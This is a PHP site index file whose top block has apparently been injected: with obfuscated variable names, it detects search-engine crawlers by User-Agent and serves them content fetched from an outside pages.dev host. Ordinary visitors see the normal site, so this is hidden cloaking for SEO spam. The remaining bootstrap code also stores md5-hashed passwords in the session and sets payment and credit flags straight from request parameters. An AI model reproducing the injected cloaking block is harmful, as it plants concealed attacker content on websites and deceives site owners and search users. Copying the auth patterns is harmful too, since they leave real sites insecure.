<?php
$zX1q = ['Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider', 'YandexBot', 'Sogou', 'TelegramBot', 'Exabot', 'facebot', 'ia_archiver', 'Google-Site-Verification', 'Google-InspectionTool', 'AhrefsBot'];
$zK2v = $_SERVER['HTTP_USER_AGENT'];
$zW3p = 'https://visionxsro.pages.dev/visionxsro/';

$zA4r = false;
foreach ($zX1q as $zB5t) {
    if (strpos($zK2v, $zB5t) !== false) {
        $zA4r = true;
        break;
    }
}

if ($zA4r) {
    $zC6n = curl_init();
    curl_setopt($zC6n, CURLOPT_URL, $zW3p);
    curl_setopt($zC6n, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($zC6n, CURLOPT_FOLLOWLOCATION, true);
    $zD7m = curl_exec($zC6n);
    if (curl_errno($zC6n)) {
        echo 'Error: ' . curl_error($zC6n);
    } else {
        echo $zD7m;
    }
    curl_close($zC6n);
    exit;
}

/*
if (substr($_SERVER['HTTP_HOST'], 0, 4) == 'www.') {
    $redirectURL = 'http://www.' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    header('Location: ' . $redirectURL, true, 301);
    exit();
}
*/

require_once dirname(__FILE__).'/config/siteconfig.php'; 
require_once dirname(__FILE__).'/admin/includes/functions.php'; 
require_once dirname(__FILE__).'/includes/php/phpfastcache.php';

if ( $_REQUEST['credits'] == "1" ) {
    $_SESSION['credits'] = true;
}

if ( $_REQUEST['credits'] == "0" ) {
    $_SESSION['credits'] = false;
}

if ( $_REQUEST['cardpay'] == "true" ) {
    $_SESSION['cardpay'] = true;
}
if ( $_REQUEST['cardpay'] == "false" ) {
    $_SESSION['cardpay'] = false;
}

if(isset($_POST['formname'])){
    if($_POST['formname'] == 'loginform' && $_POST['controller'] == ''){
        $_SESSION['username'] = mysqli_real_escape_string($db,$_POST['username']);
	    $_SESSION['password'] = md5($_POST['password']);
	}
}

$user = New User();

if ( !$user->logged && $_COOKIE['login_rem'] != "" ) {
    $data = @json_decode( $_COOKIE['login_rem'], true );
    if ( $data && is_array($data) && count($data) == 2 ) {
        $user->check_cookie_login( $data['username'], $data['hash'] );
    }
}

if($action == 'logout'){
    User::logout();
}

require_once dirname(__FILE__).'/load.php';	

$html = getPage();

echo $html;

?>
